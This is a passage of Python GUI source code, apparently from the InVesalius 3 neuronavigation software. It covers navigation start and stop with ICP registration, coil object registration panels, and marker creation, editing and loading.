self.m_icp, point_coord, transformed_points, prev_error, final_error = dialog.GetValue()
#TODO: checkbox in the dialog to transfer the icp points to 3D viewer
#create markers
# for i in range(len(point_coord)):
# img_coord = point_coord[i][0],-point_coord[i][1],point_coord[i][2], 0, 0, 0
# transf_coord = transformed_points[i][0],-transformed_points[i][1],transformed_points[i][2], 0, 0, 0
# Publisher.sendMessage('Create marker', coord=img_coord, marker_id=None, colour=(1,0,0))
# Publisher.sendMessage('Create marker', coord=transf_coord, marker_id=None, colour=(0,0,1))
if self.m_icp is not None:
dlg.ReportICPerror(prev_error, final_error)
self.checkicp.Enable(True)
self.checkicp.SetValue(True)
self.icp = True
else:
self.checkicp.Enable(False)
self.checkicp.SetValue(False)
self.icp = False
return self.m_icp
def Oncheckicp(self, evt, ctrl):
if ctrl.GetValue() and evt and (self.m_icp is not None):
self.icp = True
else:
self.icp = False
self.ctrl_icp()
def ctrl_icp(self):
if self.icp:
self.UpdateFRE(self.icp_fre)
else:
self.UpdateFRE(self.fre)
self.icp_queue.put_nowait([self.icp, self.m_icp])
#print(self.icp, self.m_icp)
def OnNavigate(self, evt, btn):
btn_nav = btn[0]
choice_trck = btn[1]
choice_ref = btn[2]
errors = False
# initialize jobs list
jobs_list = []
vis_components = [self.trigger_state, self.view_tracts]
vis_queues = [self.coord_queue, self.trigger_queue, self.tracts_queue, self.icp_queue]
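        # vis_components/vis_queues feed the UpdateNavigationScene consumer thread; the trigger
        # and tract queues are only used when those features are enabled.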
nav_id = btn_nav.GetValue()
if not nav_id:
self.event.set()
# print("coord unfinished: {}, queue {}", self.coord_queue.unfinished_tasks, self.coord_queue.qsize())
# print("coord_tracts unfinished: {}, queue {}", self.coord_tracts_queue.unfinished_tasks, self.coord_tracts_queue.qsize())
# print("tracts unfinished: {}, queue {}", self.tracts_queue.unfinished_tasks, self.tracts_queue.qsize())
self.coord_queue.clear()
# self.visualization_queue.clear()
if self.trigger_state:
self.trigger_queue.clear()
if self.view_tracts:
self.coord_tracts_queue.clear()
self.tracts_queue.clear()
# print("coord after unfinished: {}, queue {}", self.coord_queue.unfinished_tasks, self.coord_queue.qsize())
# print("coord_tracts after unfinished: {}, queue {}", self.coord_tracts_queue.unfinished_tasks, self.coord_tracts_queue.qsize())
# print("tracts after unfinished: {}, queue {}", self.tracts_queue.unfinished_tasks, self.tracts_queue.qsize())
self.coord_queue.join()
# self.visualization_queue.join()
if self.trigger_state:
self.trigger_queue.join()
if self.view_tracts:
self.coord_tracts_queue.join()
self.tracts_queue.join()
# print("coord join unfinished: {}, queue {}", self.coord_queue.unfinished_tasks, self.coord_queue.qsize())
# print("vis join unfinished: {}, queue {}", self.visualization_queue.unfinished_tasks, self.visualization_queue.qsize())
tooltip = wx.ToolTip(_("Start neuronavigation"))
btn_nav.SetToolTip(tooltip)
# Enable all navigation buttons
choice_ref.Enable(True)
choice_trck.Enable(True)
for btn_c in self.btns_coord:
btn_c.Enable(True)
# if self.trigger_state:
# self.trigger.stop()
Publisher.sendMessage("Navigation status", nav_status=False, vis_status=vis_components)
else:
if np.isnan(self.fiducials).any():
wx.MessageBox(_("Invalid fiducials, select all coordinates."), _("InVesalius 3"))
btn_nav.SetValue(False)
elif not self.trk_init[0] or not self.tracker_id:
dlg.ShowNavigationTrackerWarning(0, 'choose')
errors = True
else:
if self.event.is_set():
self.event.clear()
# prepare GUI for navigation
Publisher.sendMessage("Navigation status", nav_status=True, vis_status=vis_components)
Publisher.sendMessage("Toggle Cross", id=const.SLICE_STATE_CROSS)
Publisher.sendMessage("Hide current mask")
tooltip = wx.ToolTip(_("Stop neuronavigation"))
btn_nav.SetToolTip(tooltip)
# disable all navigation buttons
choice_ref.Enable(False)
choice_trck.Enable(False)
for btn_c in self.btns_coord:
btn_c.Enable(False)
# fiducials matrix
m_change = tr.affine_matrix_from_points(self.fiducials[3:, :].T, self.fiducials[:3, :].T,
shear=False, scale=False)
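                # Rigid transform (no shear or scale) that maps the tracker-space fiducials
                # onto the image-space fiducials.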
# initialize spatial tracker parameters
tracker_mode = self.trk_init, self.tracker_id, self.ref_mode_id
# compute fiducial registration error (FRE)
if not self.icp_fre:
self.fre = db.calculate_fre(self.fiducials_raw, self.fiducials, self.ref_mode_id, m_change)
self.UpdateFRE(self.fre)
if self.track_obj:
# if object tracking is selected
if not self.obj_reg_status:
# check if object registration was performed
wx.MessageBox(_("Perform coil registration before navigation."), _("InVesalius 3"))
errors = True
else:
# if object registration was correctly performed continue with navigation
# obj_reg[0] is object 3x3 fiducial matrix and obj_reg[1] is 3x3 orientation matrix
obj_fiducials, obj_orients, obj_ref_mode, obj_name = self.obj_reg
coreg_data = [m_change, obj_ref_mode]
if self.ref_mode_id:
coord_raw = dco.GetCoordinates(self.trk_init, self.tracker_id, self.ref_mode_id)
else:
coord_raw = np.array([None])
obj_data = db.object_registration(obj_fiducials, obj_orients, coord_raw, m_change)
coreg_data.extend(obj_data)
queues = [self.coord_queue, self.coord_tracts_queue, self.icp_queue]
jobs_list.append(dcr.CoordinateCorregistrate(self.ref_mode_id, tracker_mode, coreg_data,
self.view_tracts, queues,
self.event, self.sleep_nav))
else:
coreg_data = (m_change, 0)
queues = [self.coord_queue, self.coord_tracts_queue, self.icp_queue]
jobs_list.append(dcr.CoordinateCorregistrateNoObject(self.ref_mode_id, tracker_mode, coreg_data,
self.view_tracts, queues,
self.event, self.sleep_nav))
if not errors:
#TODO: Test the trigger thread
if self.trigger_state:
# self.trigger = trig.Trigger(nav_id)
jobs_list.append(trig.TriggerNew(self.trigger_queue, self.event, self.sleep_nav))
if self.view_tracts:
# initialize Trekker parameters
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
affine = slic.affine.copy()
affine[1, -1] -= matrix_shape[1]
affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(affine)
Publisher.sendMessage("Update marker offset state", create=True)
self.trk_inp = self.trekker, affine, self.seed_offset, self.n_tracts, self.seed_radius,\
self.n_threads, self.act_data, affine_vtk, matrix_shape[1]
# print("Appending the tract computation thread!")
queues = [self.coord_tracts_queue, self.tracts_queue]
if self.enable_act:
jobs_list.append(dti.ComputeTractsACTThread(self.trk_inp, queues, self.event, self.sleep_nav))
else:
jobs_list.append(dti.ComputeTractsThread(self.trk_inp, queues, self.event, self.sleep_nav))
jobs_list.append(UpdateNavigationScene(vis_queues, vis_components,
self.event, self.sleep_nav))
for jobs in jobs_list:
# jobs.daemon = True
jobs.start()
# del jobs
if not self.checkicp.GetValue():
if dlg.ICPcorregistration(self.fre):
m_icp = self.OnICP()
self.icp_fre = db.calculate_fre(self.fiducials_raw, self.fiducials, self.ref_mode_id,
m_change, m_icp)
self.ctrl_icp()
def ResetImageFiducials(self):
for m in range(0, 3):
self.btns_coord[m].SetValue(False)
self.fiducials[m, :] = [np.nan, np.nan, np.nan]
for n in range(0, 3):
self.numctrls_coord[m][n].SetValue(0.0)
def ResetTrackerFiducials(self):
for m in range(3, 6):
self.fiducials[m, :] = [np.nan, np.nan, np.nan]
for n in range(0, 3):
self.numctrls_coord[m][n].SetValue(0.0)
self.txtctrl_fre.SetValue('')
self.txtctrl_fre.SetBackgroundColour('WHITE')
def ResetIcp(self):
self.m_icp = None
self.fre = None
self.icp_fre = None
self.icp = False
self.checkicp.Enable(False)
self.checkicp.SetValue(False)
def OnCloseProject(self):
self.ResetTrackerFiducials()
self.ResetImageFiducials()
self.ResetIcp()
self.OnChoiceTracker(False, self.choice_trck)
Publisher.sendMessage('Update object registration')
Publisher.sendMessage('Update track object state', flag=False, obj_name=False)
Publisher.sendMessage('Delete all markers')
Publisher.sendMessage("Update marker offset state", create=False)
Publisher.sendMessage("Remove tracts")
Publisher.sendMessage("Set cross visibility", visibility=0)
# TODO: Reset camera initial focus
Publisher.sendMessage('Reset cam clipping range')
class ObjectRegistrationPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.coil_list = const.COIL
self.nav_prop = None
self.obj_fiducials = None
self.obj_orients = None
self.obj_ref_mode = None
self.obj_name = None
self.timestamp = const.TIMESTAMP
self.SetAutoLayout(1)
self.__bind_events()
# Button for creating new coil
tooltip = wx.ToolTip(_("Create new coil"))
btn_new = wx.Button(self, -1, _("New"), size=wx.Size(65, 23))
btn_new.SetToolTip(tooltip)
btn_new.Enable(1)
btn_new.Bind(wx.EVT_BUTTON, self.OnLinkCreate)
self.btn_new = btn_new
# Button for import config coil file
tooltip = wx.ToolTip(_("Load coil configuration file"))
btn_load = wx.Button(self, -1, _("Load"), size=wx.Size(65, 23))
btn_load.SetToolTip(tooltip)
btn_load.Enable(1)
btn_load.Bind(wx.EVT_BUTTON, self.OnLinkLoad)
self.btn_load = btn_load
# Save button for object registration
tooltip = wx.ToolTip(_(u"Save object registration file"))
btn_save = wx.Button(self, -1, _(u"Save"), size=wx.Size(65, 23))
btn_save.SetToolTip(tooltip)
btn_save.Enable(1)
btn_save.Bind(wx.EVT_BUTTON, self.ShowSaveObjectDialog)
self.btn_save = btn_save
# Create a horizontal sizer to represent button save
line_save = wx.BoxSizer(wx.HORIZONTAL)
line_save.Add(btn_new, 1, wx.LEFT | wx.TOP | wx.RIGHT, 4)
line_save.Add(btn_load, 1, wx.LEFT | wx.TOP | wx.RIGHT, 4)
line_save.Add(btn_save, 1, wx.LEFT | wx.TOP | wx.RIGHT, 4)
# Change angles threshold
text_angles = wx.StaticText(self, -1, _("Angle threshold [degrees]:"))
spin_size_angles = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_size_angles.SetRange(1, 99)
spin_size_angles.SetValue(const.COIL_ANGLES_THRESHOLD)
spin_size_angles.Bind(wx.EVT_TEXT, partial(self.OnSelectAngleThreshold, ctrl=spin_size_angles))
spin_size_angles.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectAngleThreshold, ctrl=spin_size_angles))
# Change dist threshold
text_dist = wx.StaticText(self, -1, _("Distance threshold [mm]:"))
spin_size_dist = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_size_dist.SetRange(1, 99)
spin_size_dist.SetValue(const.COIL_ANGLES_THRESHOLD)
spin_size_dist.Bind(wx.EVT_TEXT, partial(self.OnSelectDistThreshold, ctrl=spin_size_dist))
spin_size_dist.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectDistThreshold, ctrl=spin_size_dist))
# Change timestamp interval
text_timestamp = wx.StaticText(self, -1, _("Timestamp interval [s]:"))
spin_timestamp_dist = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc = 0.1)
spin_timestamp_dist.SetRange(0.5, 60.0)
spin_timestamp_dist.SetValue(self.timestamp)
spin_timestamp_dist.Bind(wx.EVT_TEXT, partial(self.OnSelectTimestamp, ctrl=spin_timestamp_dist))
spin_timestamp_dist.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectTimestamp, ctrl=spin_timestamp_dist))
self.spin_timestamp_dist = spin_timestamp_dist
# Create a horizontal sizer to threshold configs
line_angle_threshold = wx.BoxSizer(wx.HORIZONTAL)
line_angle_threshold.AddMany([(text_angles, 1, wx.EXPAND | wx.GROW | wx.TOP| wx.RIGHT | wx.LEFT, 5),
(spin_size_angles, 0, wx.ALL | wx.EXPAND | wx.GROW, 5)])
line_dist_threshold = wx.BoxSizer(wx.HORIZONTAL)
line_dist_threshold.AddMany([(text_dist, 1, wx.EXPAND | wx.GROW | wx.TOP| wx.RIGHT | wx.LEFT, 5),
(spin_size_dist, 0, wx.ALL | wx.EXPAND | wx.GROW, 5)])
line_timestamp = wx.BoxSizer(wx.HORIZONTAL)
line_timestamp.AddMany([(text_timestamp, 1, wx.EXPAND | wx.GROW | wx.TOP| wx.RIGHT | wx.LEFT, 5),
(spin_timestamp_dist, 0, wx.ALL | wx.EXPAND | wx.GROW, 5)])
# Check box for trigger monitoring to create markers from serial port
checkrecordcoords = wx.CheckBox(self, -1, _('Record coordinates'))
checkrecordcoords.SetValue(False)
checkrecordcoords.Enable(0)
checkrecordcoords.Bind(wx.EVT_CHECKBOX, partial(self.OnRecordCoords, ctrl=checkrecordcoords))
self.checkrecordcoords = checkrecordcoords
# Check box to track object or simply the stylus
checktrack = wx.CheckBox(self, -1, _('Track object'))
checktrack.SetValue(False)
checktrack.Enable(0)
checktrack.Bind(wx.EVT_CHECKBOX, partial(self.OnTrackObject, ctrl=checktrack))
self.checktrack = checktrack
line_checks = wx.BoxSizer(wx.HORIZONTAL)
line_checks.Add(checkrecordcoords, 0, wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, 5)
line_checks.Add(checktrack, 0, wx.RIGHT | wx.LEFT, 5)
# Add line sizers into main sizer
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(line_save, 0, wx.LEFT | wx.RIGHT | wx.TOP | wx.ALIGN_CENTER_HORIZONTAL, 5)
main_sizer.Add(line_angle_threshold, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5)
main_sizer.Add(line_dist_threshold, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5)
main_sizer.Add(line_timestamp, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5)
main_sizer.Add(line_checks, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP | wx.BOTTOM, 10)
main_sizer.Fit(self)
self.SetSizer(main_sizer)
self.Update()
def __bind_events(self):
Publisher.subscribe(self.UpdateTrackerInit, 'Update tracker initializer')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.OnRemoveObject, 'Remove object data')
def UpdateTrackerInit(self, nav_prop):
self.nav_prop = nav_prop
def UpdateNavigationStatus(self, nav_status, vis_status):
if nav_status:
self.checkrecordcoords.Enable(1)
self.checktrack.Enable(0)
self.btn_save.Enable(0)
self.btn_new.Enable(0)
self.btn_load.Enable(0)
else:
self.OnRecordCoords(nav_status, self.checkrecordcoords)
self.checkrecordcoords.SetValue(False)
self.checkrecordcoords.Enable(0)
self.btn_save.Enable(1)
self.btn_new.Enable(1)
self.btn_load.Enable(1)
if self.obj_fiducials is not None:
self.checktrack.Enable(1)
#Publisher.sendMessage('Enable target button', True)
def OnSelectAngleThreshold(self, evt, ctrl):
Publisher.sendMessage('Update angle threshold', angle=ctrl.GetValue())
def OnSelectDistThreshold(self, evt, ctrl):
Publisher.sendMessage('Update dist threshold', dist_threshold=ctrl.GetValue())
def OnSelectTimestamp(self, evt, ctrl):
self.timestamp = ctrl.GetValue()
def OnRecordCoords(self, evt, ctrl):
if ctrl.GetValue() and evt:
self.spin_timestamp_dist.Enable(0)
self.thr_record = rec.Record(ctrl.GetValue(), self.timestamp)
        elif (not ctrl.GetValue() and evt) or (ctrl.GetValue() and not evt):
self.spin_timestamp_dist.Enable(1)
self.thr_record.stop()
elif not ctrl.GetValue() and not evt:
            pass
def OnTrackObject(self, evt, ctrl):
Publisher.sendMessage('Update track object state', flag=evt.GetSelection(), obj_name=self.obj_name)
def OnComboCoil(self, evt):
# coil_name = evt.GetString()
coil_index = evt.GetSelection()
Publisher.sendMessage('Change selected coil', self.coil_list[coil_index][1])
def OnLinkCreate(self, event=None):
if self.nav_prop:
dialog = dlg.ObjectCalibrationDialog(self.nav_prop)
try:
if dialog.ShowModal() == wx.ID_OK:
self.obj_fiducials, self.obj_orients, self.obj_ref_mode, self.obj_name, polydata = dialog.GetValue()
if np.isfinite(self.obj_fiducials).all() and np.isfinite(self.obj_orients).all():
self.checktrack.Enable(1)
Publisher.sendMessage('Update object registration',
data=(self.obj_fiducials, self.obj_orients, self.obj_ref_mode, self.obj_name))
Publisher.sendMessage('Update status text in GUI',
label=_("Ready"))
# Enable automatically Track object, Show coil and disable Vol. Camera
self.checktrack.SetValue(True)
Publisher.sendMessage('Update track object state', flag=True, obj_name=self.obj_name, polydata=polydata)
Publisher.sendMessage('Change camera checkbox', status=False)
except wx._core.PyAssertionError: # TODO FIX: win64
pass
else:
dlg.ShowNavigationTrackerWarning(0, 'choose')
def OnLinkLoad(self, event=None):
filename = dlg.ShowLoadSaveDialog(message=_(u"Load object registration"),
wildcard=_("Registration files (*.obr)|*.obr"))
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# coil_path = 'magstim_coil_dell_laptop.obr'
# filename = os.path.join(data_dir, coil_path)
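        # .obr layout (mirrors ShowSaveObjectDialog): a tab-separated header carrying the object
        # name and reference mode, followed by one row per fiducial with xyz plus orientation values.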
try:
if filename:
#TODO: Improve method to read the file, using "with" similar to OnLoadParameters
data = np.loadtxt(filename, delimiter='\t')
self.obj_fiducials = data[:, :3]
self.obj_orients = data[:, 3:]
text_file = open(filename, "r")
header = text_file.readline().split('\t')
text_file.close()
self.obj_name = header[1]
self.obj_ref_mode = int(header[-1])
self.checktrack.Enable(1)
self.checktrack.SetValue(True)
Publisher.sendMessage('Update object registration',
data=(self.obj_fiducials, self.obj_orients, self.obj_ref_mode, self.obj_name))
Publisher.sendMessage('Update status text in GUI',
label=_("Object file successfully loaded"))
Publisher.sendMessage('Update track object state', flag=True, obj_name=self.obj_name)
Publisher.sendMessage('Change camera checkbox', status=False)
# wx.MessageBox(_("Object file successfully loaded"), _("Load"))
except:
wx.MessageBox(_("Object registration file incompatible."), _("InVesalius 3"))
Publisher.sendMessage('Update status text in GUI', label="")
def ShowSaveObjectDialog(self, evt):
if np.isnan(self.obj_fiducials).any() or np.isnan(self.obj_orients).any():
wx.MessageBox(_("Digitize all object fiducials before saving"), _("Save error"))
else:
filename = dlg.ShowLoadSaveDialog(message=_(u"Save object registration as..."),
wildcard=_("Registration files (*.obr)|*.obr"),
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_filename="object_registration.obr", save_ext="obr")
if filename:
hdr = 'Object' + "\t" + utils.decode(self.obj_name, const.FS_ENCODE) + "\t" + 'Reference' + "\t" + str('%d' % self.obj_ref_mode)
data = np.hstack([self.obj_fiducials, self.obj_orients])
np.savetxt(filename, data, fmt='%.4f', delimiter='\t', newline='\n', header=hdr)
wx.MessageBox(_("Object file successfully saved"), _("Save"))
def OnCloseProject(self):
self.OnRemoveObject()
def OnRemoveObject(self):
self.checkrecordcoords.SetValue(False)
self.checkrecordcoords.Enable(0)
self.checktrack.SetValue(False)
self.checktrack.Enable(0)
self.nav_prop = None
self.obj_fiducials = None
self.obj_orients = None
self.obj_ref_mode = None
self.obj_name = None
self.timestamp = const.TIMESTAMP
Publisher.sendMessage('Update track object state', flag=False, obj_name=False)
class MarkersPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.SetAutoLayout(1)
self.__bind_events()
self.current_coord = 0, 0, 0, 0, 0, 0
self.current_angle = 0, 0, 0
self.current_seed = 0, 0, 0
self.list_coord = []
self.marker_ind = 0
self.tgt_flag = self.tgt_index = None
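        # tgt_flag / tgt_index remember which marker (if any) is the current navigation target;
        # the target row is highlighted in red and labelled 'TARGET' in the list below.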
self.nav_status = False
self.marker_colour = const.MARKER_COLOUR
self.marker_size = const.MARKER_SIZE
# Change marker size
spin_size = wx.SpinCtrl(self, -1, "", size=wx.Size(40, 23))
spin_size.SetRange(1, 99)
spin_size.SetValue(self.marker_size)
spin_size.Bind(wx.EVT_TEXT, partial(self.OnSelectSize, ctrl=spin_size))
spin_size.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectSize, ctrl=spin_size))
# Marker colour select
select_colour = csel.ColourSelect(self, -1, colour=[255*s for s in self.marker_colour], size=wx.Size(20, 23))
select_colour.Bind(csel.EVT_COLOURSELECT, partial(self.OnSelectColour, ctrl=select_colour))
btn_create = wx.Button(self, -1, label=_('Create marker'), size=wx.Size(135, 23))
btn_create.Bind(wx.EVT_BUTTON, self.OnCreateMarker)
sizer_create = wx.FlexGridSizer(rows=1, cols=3, hgap=5, vgap=5)
sizer_create.AddMany([(spin_size, 1),
(select_colour, 0),
(btn_create, 0)])
# Buttons to save and load markers and to change its visibility as well
btn_save = wx.Button(self, -1, label=_('Save'), size=wx.Size(65, 23))
btn_save.Bind(wx.EVT_BUTTON, self.OnSaveMarkers)
btn_load = wx.Button(self, -1, label=_('Load'), size=wx.Size(65, 23))
btn_load.Bind(wx.EVT_BUTTON, self.OnLoadMarkers)
btn_visibility = wx.ToggleButton(self, -1, _("Hide"), size=wx.Size(65, 23))
btn_visibility.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnMarkersVisibility, ctrl=btn_visibility))
sizer_btns = wx.FlexGridSizer(rows=1, cols=3, hgap=5, vgap=5)
sizer_btns.AddMany([(btn_save, 1, wx.RIGHT),
(btn_load, 0, wx.LEFT | wx.RIGHT),
(btn_visibility, 0, wx.LEFT)])
# Buttons to delete or remove markers
btn_delete_single = wx.Button(self, -1, label=_('Remove'), size=wx.Size(65, 23))
btn_delete_single.Bind(wx.EVT_BUTTON, self.OnDeleteSingleMarker)
btn_delete_all = wx.Button(self, -1, label=_('Delete all'), size=wx.Size(135, 23))
btn_delete_all.Bind(wx.EVT_BUTTON, self.OnDeleteAllMarkers)
sizer_delete = wx.FlexGridSizer(rows=1, cols=2, hgap=5, vgap=5)
sizer_delete.AddMany([(btn_delete_single, 1, wx.RIGHT),
(btn_delete_all, 0, wx.LEFT)])
# List of markers
self.lc = wx.ListCtrl(self, -1, style=wx.LC_REPORT, size=wx.Size(0,120))
self.lc.InsertColumn(0, '#')
self.lc.InsertColumn(1, 'X')
self.lc.InsertColumn(2, 'Y')
self.lc.InsertColumn(3, 'Z')
self.lc.InsertColumn(4, 'ID')
self.lc.SetColumnWidth(0, 28)
self.lc.SetColumnWidth(1, 50)
self.lc.SetColumnWidth(2, 50)
self.lc.SetColumnWidth(3, 50)
self.lc.SetColumnWidth(4, 60)
self.lc.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnMouseRightDown)
self.lc.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnItemBlink)
self.lc.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnStopItemBlink)
# Add all lines into main sizer
group_sizer = wx.BoxSizer(wx.VERTICAL)
group_sizer.Add(sizer_create, 0, wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 5)
group_sizer.Add(sizer_btns, 0, wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 5)
group_sizer.Add(sizer_delete, 0, wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 5)
group_sizer.Add(self.lc, 0, wx.EXPAND | wx.ALL, 5)
group_sizer.Fit(self)
self.SetSizer(group_sizer)
self.Update()
def __bind_events(self):
# Publisher.subscribe(self.UpdateCurrentCoord, 'Co-registered points')
Publisher.subscribe(self.UpdateCurrentCoord, 'Set cross focal point')
Publisher.subscribe(self.OnDeleteSingleMarker, 'Delete fiducial marker')
Publisher.subscribe(self.OnDeleteAllMarkers, 'Delete all markers')
Publisher.subscribe(self.OnCreateMarker, 'Create marker')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
Publisher.subscribe(self.UpdateSeedCoordinates, 'Update tracts')
def UpdateCurrentCoord(self, position):
self.current_coord = position
#self.current_angle = pubsub_evt.data[1][3:]
def UpdateNavigationStatus(self, nav_status, vis_status):
if not nav_status:
sleep(0.5)
#self.current_coord[3:] = 0, 0, 0
self.nav_status = False
else:
self.nav_status = True
def UpdateSeedCoordinates(self, root=None, affine_vtk=None, coord_offset=(0, 0, 0)):
self.current_seed = coord_offset
def OnMouseRightDown(self, evt):
# TODO: Enable the "Set as target" only when target is created with registered object
menu_id = wx.Menu()
edit_id = menu_id.Append(0, _('Edit ID'))
menu_id.Bind(wx.EVT_MENU, self.OnMenuEditMarkerId, edit_id)
color_id = menu_id.Append(2, _('Edit color'))
menu_id.Bind(wx.EVT_MENU, self.OnMenuSetColor, color_id)
menu_id.AppendSeparator()
target_menu = menu_id.Append(1, _('Set as target'))
menu_id.Bind(wx.EVT_MENU, self.OnMenuSetTarget, target_menu)
# TODO: Create the remove target option so the user can disable the target without removing the marker
# target_menu_rem = menu_id.Append(3, _('Remove target'))
# menu_id.Bind(wx.EVT_MENU, self.OnMenuRemoveTarget, target_menu_rem)
target_menu.Enable(True)
self.PopupMenu(menu_id)
menu_id.Destroy()
def OnItemBlink(self, evt):
Publisher.sendMessage('Blink Marker', index=self.lc.GetFocusedItem())
def OnStopItemBlink(self, evt):
Publisher.sendMessage('Stop Blink Marker')
def OnMenuEditMarkerId(self, evt):
list_index = self.lc.GetFocusedItem()
if evt == 'TARGET':
id_label = evt
else:
id_label = dlg.ShowEnterMarkerID(self.lc.GetItemText(list_index, 4))
if id_label == 'TARGET':
id_label = ''
wx.MessageBox(_("Invalid TARGET ID."), _("InVesalius 3"))
self.lc.SetItem(list_index, 4, id_label)
# Add the new ID to exported list
if len(self.list_coord[list_index]) > 8:
self.list_coord[list_index][10] = str(id_label)
else:
self.list_coord[list_index][7] = str(id_label)
def OnMenuSetTarget(self, evt):
if isinstance(evt, int):
self.lc.Focus(evt)
if self.tgt_flag:
self.lc.SetItemBackgroundColour(self.tgt_index, 'white')
Publisher.sendMessage('Set target transparency', status=False, index=self.tgt_index)
self.lc.SetItem(self.tgt_index, 4, '')
# Add the new ID to exported list
if len(self.list_coord[self.tgt_index]) > 8:
self.list_coord[self.tgt_index][10] = str('')
else:
self.list_coord[self.tgt_index][7] = str('')
self.tgt_index = self.lc.GetFocusedItem()
self.lc.SetItemBackgroundColour(self.tgt_index, 'RED')
Publisher.sendMessage('Update target', coord=self.list_coord[self.tgt_index][:6])
Publisher.sendMessage('Set target transparency', status=True, index=self.tgt_index)
Publisher.sendMessage('Disable or enable coil tracker', status=True)
self.OnMenuEditMarkerId('TARGET')
self.tgt_flag = True
wx.MessageBox(_("New target selected."), _("InVesalius 3"))
def OnMenuSetColor(self, evt):
index = self.lc.GetFocusedItem()
color_current = [self.list_coord[index][n] * 255 for n in range(6, 9)]
color_new = dlg.ShowColorDialog(color_current=color_current)
if color_new:
assert len(color_new) == 3
for n, col in enumerate(color_new):
self.list_coord[index][n+6] = col/255.0
Publisher.sendMessage('Set new color', index=index, color=color_new)
def OnDeleteAllMarkers(self, evt=None):
if self.list_coord:
if evt is None:
result = wx.ID_OK
else:
# result = dlg.DeleteAllMarkers()
result = dlg.ShowConfirmationDialog(msg=_("Remove all markers? Cannot be undone."))
if result == wx.ID_OK:
self.list_coord = []
self.marker_ind = 0
Publisher.sendMessage('Remove all markers', indexes=self.lc.GetItemCount())
self.lc.DeleteAllItems()
Publisher.sendMessage('Stop Blink Marker', index='DeleteAll')
if self.tgt_flag:
self.tgt_flag = self.tgt_index = None
Publisher.sendMessage('Disable or enable coil tracker', status=False)
if not hasattr(evt, 'data'):
wx.MessageBox(_("Target deleted."), _("InVesalius 3"))
def OnDeleteSingleMarker(self, evt=None, marker_id=None):
# OnDeleteSingleMarker is used for both pubsub and button click events
# Pubsub is used for fiducial handle and button click for all others
if not evt:
if self.lc.GetItemCount():
for id_n in range(self.lc.GetItemCount()):
item = self.lc.GetItem(id_n, 4)
if item.GetText() == marker_id:
for i in const.BTNS_IMG_MKS:
if marker_id in list(const.BTNS_IMG_MKS[i].values())[0]:
self.lc.Focus(item.GetId())
index = [self.lc.GetFocusedItem()]
else:
if self.lc.GetFirstSelected() != -1:
index = self.GetSelectedItems()
else:
index = None
#TODO: There are bugs when no marker is selected, test and improve
if index:
if self.tgt_flag and self.tgt_index == index[0]:
self.tgt_flag = self.tgt_index = None
Publisher.sendMessage('Disable or enable coil tracker', status=False)
wx.MessageBox(_("No data selected."), _("InVesalius 3"))
self.DeleteMarker(index)
else:
wx.MessageBox(_("Target deleted."), _("InVesalius 3"))
def DeleteMarker(self, index):
for i in reversed(index):
del self.list_coord[i]
self.lc.DeleteItem(i)
for n in range(0, self.lc.GetItemCount()):
self.lc.SetItem(n, 0, str(n+1))
self.marker_ind -= 1
Publisher.sendMessage('Remove marker', index=index)
def OnCreateMarker(self, evt=None, coord=None, marker_id=None, colour=None):
# OnCreateMarker is used for both pubsub and button click events
# Pubsub is used for markers created with fiducial buttons, trigger and create marker button
if not colour:
colour = self.marker_colour
if not coord:
coord = self.current_coord
if evt is None:
if coord:
self.CreateMarker(coord=coord, colour=(0.0, 1.0, 0.0), size=self.marker_size,
marker_id=marker_id, seed=self.current_seed)
else:
self.CreateMarker(coord=self.current_coord, colour=colour, size=self.marker_size,
seed=self.current_seed)
else:
self.CreateMarker(coord=self.current_coord, colour=colour, size=self.marker_size,
seed=self.current_seed)
def OnLoadMarkers(self, evt):
filename = dlg.ShowLoadSaveDialog(message=_(u"Load markers"),
wildcard=_("Markers files (*.mks)|*.mks"))
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# marker_path = 'markers.mks'
# filename = os.path.join(data_dir, marker_path)
if filename:
try:
count_line = self.lc.GetItemCount()
# content = [s.rstrip() for s in open(filename)]
with open(filename, 'r') as file:
reader = csv.reader(file, delimiter='\t')
content = [row for row in reader]
for line in content:
target = None
# line = [s for s in data.split()]
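# Note on the marker file layout (derived from the parsing below): newer files carry
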